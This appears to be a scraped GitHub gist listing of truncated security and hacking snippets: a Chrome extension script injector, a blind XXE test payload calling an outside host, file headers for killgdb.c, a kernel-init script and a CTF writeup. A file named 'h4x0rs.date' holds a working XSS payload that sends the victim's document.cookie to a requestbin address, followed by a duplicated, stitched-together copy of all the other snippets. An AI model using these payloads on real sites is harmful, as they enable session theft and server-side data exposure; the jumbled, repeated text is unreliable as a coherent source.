Amy itszn

## background.js
// this is the background code...

// listen for our browerAction to be clicked
chrome.browserAction.onClicked.addListener(function (tab) {
	// for the current tab, inject the "inject.js" file & execute it
	chrome.tabs.executeScript(tab.ib, {
		file: 'inject.js'
	});
});

## XXE_payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------

<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>

## killgdb.c
#include <elf.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/mman.h>

// killgdb.c - prevent an elf from being loaded by gdb.
// Jeffrey Crowell <crowell [at] bu [dot] edu>
//
// $ objcopy --only-keep-debug program program.debug

## xnu-syscall-life-amd64.md

      
              1 file
            
          
              4 forks
            
          
              1 comment
            
          
              27 stars
            
          
                yrp604
                / xnu-syscall-life-amd64.md
            
            
              Last active
              October 2, 2023 15:59
            
              
                The life of an XNU unix syscall on amd64
              
          
    XNU syscall path

Chart

             +------------------+
             |These push their  |                                  +-----------------------+
             |respective syscall|                                  |This overwrites the    |
             |dispatch functions|                                  |saved dispatch function|
             |onto the stack    |                                  |with hndl_alltraps     |


## linux.sh
#!/boot/bzImage

# Linux kernel userspace initialization code, translated to bash
# (Minus floppy disk handling, because seriously, it's 2017.)
# Not 100% accurate, but gives you a good idea of how kernel init works
# GPLv2, Copyright 2017 Hector Martin <marcan@marcan.st>
# Based on Linux 4.10-rc2.

# Note: pretend chroot is a builtin and affects the current process
# Note: kernel actually uses major/minor device numbers instead of device name

## fix_bold.diff
diff --git a/x.c b/x.c
index 5828a3b..ace044f 100644
--- a/x.c
+++ b/x.c
@@ -116,8 +116,6 @@ typedef struct {
 	int width;
 	int ascent;
 	int descent;
-	int badslant;
-	int badweight;

## gamma_trick.sh
#!/bin/sh
# PNG Gamma trick (by @marcan42 / marcan@marcan.st)
#
# This script implements an improved version of the gamma trick used to make
# thumbnail images on reddit/4chan look different from the full-size image.
#
# Sample output (SFW; images by @Miluda):
#  https://mrcn.st/t/homura_gamma_trick.png
#  https://www.reddit.com/r/test/comments/6edthw/ (click for fullsize)
#  https://twitter.com/marcan42/status/869855956842143744

## LICENSE
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

## gogogadget_writeup.md

      
              1 file
            
          
              1 fork
            
          
              0 comments
            
          
              3 stars
            
          
                romanking98
                / gogogadget_writeup.md
            
            
              Created
              March 24, 2018 15:18
            
          
    GoGoGadget (1 solve)

Tool credits : @scwuaptx, pwngdb
for making public awesome malloc research
Layout

*------------------------------*
 Hi Inspector!


## h4x0rs.date
<script>location.href="//requestbin.fullcontact.com/15g8ko51?"+document.cookie</script>
<iframe src=/profile.php?id=c7ab51c5bdeec6bc6068d8a643a29907a1b7c71acb455454381fe7320cd5283e id=msg csp="script-src 'unsafe-inline';">
	// this is the background code...

	// listen for our browerAction to be clicked
	chrome.browserAction.onClicked.addListener(function (tab) {
	// for the current tab, inject the "inject.js" file & execute it
	chrome.tabs.executeScript(tab.ib, {
	file: 'inject.js'
	});
	});
	--------------------------------------------------------------
	Vanilla, used to verify outbound xxe or blind xxe
	--------------------------------------------------------------

	<?xml version="1.0" ?>
	<!DOCTYPE r [
	<!ELEMENT r ANY >
	<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
	]>
	<r>&sp;</r>
	#include <elf.h>
	#include <fcntl.h>
	#include <stdio.h>
	#include <stdlib.h>
	#include <sys/mman.h>

	// killgdb.c - prevent an elf from being loaded by gdb.
	// Jeffrey Crowell <crowell [at] bu [dot] edu>
	//
	// $ objcopy --only-keep-debug program program.debug
	#!/boot/bzImage

	# Linux kernel userspace initialization code, translated to bash
	# (Minus floppy disk handling, because seriously, it's 2017.)
	# Not 100% accurate, but gives you a good idea of how kernel init works
	# GPLv2, Copyright 2017 Hector Martin <marcan@marcan.st>
	# Based on Linux 4.10-rc2.

	# Note: pretend chroot is a builtin and affects the current process
	# Note: kernel actually uses major/minor device numbers instead of device name
	diff --git a/x.c b/x.c
	index 5828a3b..ace044f 100644
	--- a/x.c
	+++ b/x.c
	@@ -116,8 +116,6 @@ typedef struct {
	int width;
	int ascent;
	int descent;
	- int badslant;
	- int badweight;
	#!/bin/sh
	# PNG Gamma trick (by @marcan42 / marcan@marcan.st)
	#
	# This script implements an improved version of the gamma trick used to make
	# thumbnail images on reddit/4chan look different from the full-size image.
	#
	# Sample output (SFW; images by @Miluda):
	# https://mrcn.st/t/homura_gamma_trick.png
	# https://www.reddit.com/r/test/comments/6edthw/ (click for fullsize)
	# https://twitter.com/marcan42/status/869855956842143744
	Permission is hereby granted, free of charge, to any person obtaining a copy
	of this software and associated documentation files (the "Software"), to deal
	in the Software without restriction, including without limitation the rights
	to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
	copies of the Software, and to permit persons to whom the Software is
	furnished to do so, subject to the following conditions:

	The above copyright notice and this permission notice shall be included in all
	copies or substantial portions of the Software.
	<script>location.href="//requestbin.fullcontact.com/15g8ko51?"+document.cookie</script>
	<iframe src=/profile.php?id=c7ab51c5bdeec6bc6068d8a643a29907a1b7c71acb455454381fe7320cd5283e id=msg csp="script-src 'unsafe-inline';">